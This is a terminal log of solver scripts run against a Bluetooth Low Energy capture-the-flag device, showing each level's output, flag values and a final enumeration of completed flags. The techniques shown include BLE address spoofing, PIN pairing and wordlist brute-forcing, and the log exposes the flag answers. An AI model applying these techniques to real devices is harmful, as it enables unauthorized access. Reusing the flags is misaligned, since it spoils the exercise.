- root@PiBenchDash:/opt/BLE_CTF_V2# ./lvl_00.py
- Attached to peripheral
- Sending "12345678901234567890" to 0x2e
- Done
- root@PiBenchDash:/opt/BLE_CTF_V2# ./lvl_01.py
- Attached to peripheral
- Loading level 1
- Reading value
- Flag: fc3fd58dcdad9ab23fac
- root@PiBenchDash:/opt/BLE_CTF_V2# ./lvl_02.py
- Attached to peripheral
- Loading level 02
- Password Found: password1234
- Flag: eca7d1f3cf60a8b5344a
- /***
- * nano /etc/systemd/system/dbus-org.bluez.service
- * set: ExecStart=/usr/lib/bluetooth/bluetoothd --compat
- */
- root@PiBenchDash:/opt/BLE_CTF_V2# systemctl daemon-reload
- root@PiBenchDash:/opt/BLE_CTF_V2# service bluetooth restart
- root@PiBenchDash:/opt/BLE_CTF_V2# ./lvl_03.py
- Attached to peripheral
- Loading level 03
- Pairing
- Attached to peripheral (pid 0)
- Sending PIN: 0000
- Flag: b46fa238cf820d0f60c1
- Pairing successful
- root@PiBenchDash:/opt/BLE_CTF_V2# ./lvl_04.py
- Attached to peripheral
- Loading level 04
- Generating wordlist
- Trying: AABBC8DDEEFF
- Flag: f401f21d02fdd0a4fc00
- root@PiBenchDash:/opt/BLE_CTF_V2# ./lvl_05.py
- Attached to peripheral
- Loading level 05
- Sending "121212121222" to 0x2c
- Reading value
- Flag: 84cf61c35b2d9c92217d
- root@PiBenchDash:/opt/BLE_CTF_V2# ./lvl_06.py
- Attached to peripheral
- Loading level 06
- Manufacturer: Cypress Semiconductor Corporation (305)
- Device address: B8:27:EB:81:86:56 (Raspberry Pi Foundation)
- New BD address: 11:22:33:44:55:66
- Address changed - Reset device now
- Reading value
- Flag: 1dec0e624f2ecf1513dc
- root@PiBenchDash:/opt/BLE_CTF_V2# ./lvl_07.py
- [bp] Attached to peripheral
- [++] Loading level 07
- [sp] starting bluetoothctl
- [sp] Timeout
- [sp] Pairing successful
- [bp] Attached to peripheral
- [==] Flag: a16ee1a4001c66c3a670
- root@PiBenchDash:/opt/BLE_CTF_V2# ./lvl_09.py
- Attached to peripheral
- Loading level 09
- Starting advertisement listner
- Please wait 5s...
- Starting hcitool
- Please wait 5s...
- LE Scan ...
- 3C:71:BF:F1:EF:C6 FLAG_09
- 3C:71:BF:F1:EF:C6 (unknown)
- Name (complete): FLAG_09
- Name (complete): MD5OFLOL
- Name (complete): ..
- root@PiBenchDash:/opt/BLE_CTF_V2# ./send2handle.py 0x2e fc3fd58dcdad9ab23fac
- root@PiBenchDash:/opt/BLE_CTF_V2# ./send2handle.py 0x2e eca7d1f3cf60a8b5344a
- root@PiBenchDash:/opt/BLE_CTF_V2# ./send2handle.py 0x2e eca7d1f3cf60a8b5344a
- root@PiBenchDash:/opt/BLE_CTF_V2# ./send2handle.py 0x2e b46fa238cf820d0f60c1
- root@PiBenchDash:/opt/BLE_CTF_V2# ./send2handle.py 0x2e f401f21d02fdd0a4fc00
- root@PiBenchDash:/opt/BLE_CTF_V2# ./send2handle.py 0x2e 84cf61c35b2d9c92217d
- root@PiBenchDash:/opt/BLE_CTF_V2# ./send2handle.py 0x2e 1dec0e624f2ecf1513dc
- root@PiBenchDash:/opt/BLE_CTF_V2# ./send2handle.py 0x2e eca7d1f3cf60a8b5344a
- root@PiBenchDash:/opt/BLE_CTF_V2# ./send2handle.py 0x2e aee4bd941f8b4d9e3921
- root@PiBenchDash:/opt/BLE_CTF_V2# ./enumerate.py
- - snip -
- 42 0x2A READ docs: https://github.com/hackgnar/ble_ctf_infinity
- 44 0x2C READ Flags complete: 9 /10
- 46 0x2E READ WRITE Submit flags here
- 48 0x30 READ WRITE Write 0x0000 to 0x00FF to goto flag
- 50 0x32 READ WRITE Write 0xC1EA12 to reset all flags
- 52 0x34 READ Flag 0: Complete
- 54 0x36 READ Flag 1: Complete
- 56 0x38 READ Flag 2: Complete
- 58 0x3A READ Flag 3: Complete
- 60 0x3C READ Flag 4: Complete
- 62 0x3E READ Flag 5: Complete
- 64 0x40 READ Flag 6: Complete
- 66 0x42 READ Flag 7: Complete
- 68 0x44 READ Flag 8: Incomplete
- 70 0x46 READ Flag 9: Complete